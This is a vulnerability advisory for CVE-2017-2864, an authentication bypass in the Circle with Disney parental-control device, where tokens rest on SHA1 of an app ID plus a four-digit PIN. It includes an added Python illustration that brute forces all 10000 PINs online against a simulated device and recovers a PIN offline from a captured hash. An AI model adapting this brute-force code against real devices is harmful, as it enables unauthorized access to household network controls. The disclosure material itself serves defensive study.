Circle with Disney Weak Authentication Vulnerability(CVE-2017-2864)

2017-11-08T00:00:00
ID SSV:96817
Type seebug
Reporter Root
Modified 2017-11-08T00:00:00

Description

Summary

An exploitable vulnerability exists in the generation of authentication token functionality of Circle with Disney. Specially crafted network packets can cause a valid authentication token to be returned to the attacker resulting in authentication bypass. An attacker can send a series of packets to trigger this vulnerability.

Tested Versions

Circle with Disney

Product URLs

https://meetcircle.com/

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Details

Circle with Disney is a network device used to monitor internet use of children on a given network.

Every request to the Circle must carry an authentication token. To obtain one, a client supplies an appid, a unique string identifying the client, together with a hash, a SHA1 digest meant to prove that the client is allowed to use the device. The only secret that goes into the digest is a 4-digit PIN; the hash is computed as: hash = SHA1(appid + pin)

The client supplies both the appid and the hash, so the PIN is the only unknown in the computation. Because the PIN key space is only 10000 values, an attacker can brute force it by submitting a token request for each candidate PIN until the device accepts one and returns an authentication token. With that token in hand, the attacker can make any of the API calls the device exposes.
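The following is an added example, not code from the advisory or from Circle, that reproduces the scheme described above in a constructed simulation. The device stand-in (SimulatedCircle), its request_token method, the hex encoding of the SHA1 digest, the concatenation order appid followed by pin, and the token format are all assumptions made for illustration; the real Circle API endpoints and parameter encoding are not shown on this page. The attacker chooses an arbitrary appid and walks all 10000 PINs online until the device hands over a token. A second function shows a consequence of the unkeyed construction: if a valid appid/hash pair has been observed, the PIN can be recovered offline without contacting the device at all.

```python
import hashlib
import secrets


def expected_hash(appid: str, pin: str) -> str:
    """hash = SHA1(appid + pin), as stated in the advisory.

    Hex encoding and the appid-then-pin concatenation order are assumptions.
    """
    return hashlib.sha1((appid + pin).encode("utf-8")).hexdigest()


class SimulatedCircle:
    """Constructed stand-in for the device's token issuer (not Circle's code).

    It knows the 4-digit PIN and returns a token whenever the client-supplied
    hash equals SHA1(appid + pin) for the client-supplied appid.
    """

    def __init__(self, pin: str) -> None:
        if len(pin) != 4 or not pin.isdigit():
            raise ValueError("PIN must be exactly four decimal digits")
        self._pin = pin
        self.attempts = 0  # number of token requests seen, to measure the attack

    def request_token(self, appid: str, client_hash: str):
        self.attempts += 1
        if client_hash == expected_hash(appid, self._pin):
            # Hypothetical token format; the real format is not on the page.
            return "token-" + secrets.token_hex(8)
        return None


def brute_force_token(device: SimulatedCircle, appid: str):
    """Online attack: try every PIN 0000..9999 with an attacker-chosen appid.

    Returns (pin, token) as soon as the device accepts a hash, or (None, None).
    """
    for n in range(10000):
        pin = f"{n:04d}"
        token = device.request_token(appid, expected_hash(appid, pin))
        if token is not None:
            return pin, token
    return None, None


def recover_pin_offline(appid: str, observed_hash: str):
    """Offline attack: given one observed (appid, hash) pair from a legitimate
    client, recover the PIN by recomputing SHA1(appid + pin) for all 10000
    candidates. No requests to the device are needed because nothing secret
    beyond the PIN enters the hash.
    """
    for n in range(10000):
        pin = f"{n:04d}"
        if expected_hash(appid, pin) == observed_hash:
            return pin
    return None


if __name__ == "__main__":
    circle = SimulatedCircle("4821")  # constructed secret PIN
    pin, token = brute_force_token(circle, "any-string-the-attacker-picks")
    print(f"online: pin={pin} token={token} after {circle.attempts} requests")

    captured = expected_hash("legit-client", "0007")  # constructed captured pair
    print("offline: pin =", recover_pin_offline("legit-client", captured))
```

The online loop needs at most 10000 requests and on average 5000; since the device places no secret of its own into the hash, the offline variant reduces the whole scheme to a single observation plus 10000 SHA1 computations, which is why the advisory rates the PIN alone as an inadequate authentication factor.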

Timeline

  • 2017-07-13 - Vendor Disclosure
  • 2017-10-31 - Public Release

CREDIT

Discovered by Cory Duplantis, Yves Younan, Marcin 'Icewall' Noga, Claudio Bozzato, Lilith Wyatt <(^_^)>, Aleksandar Nikolic, and Richard Johnson of Cisco Talos.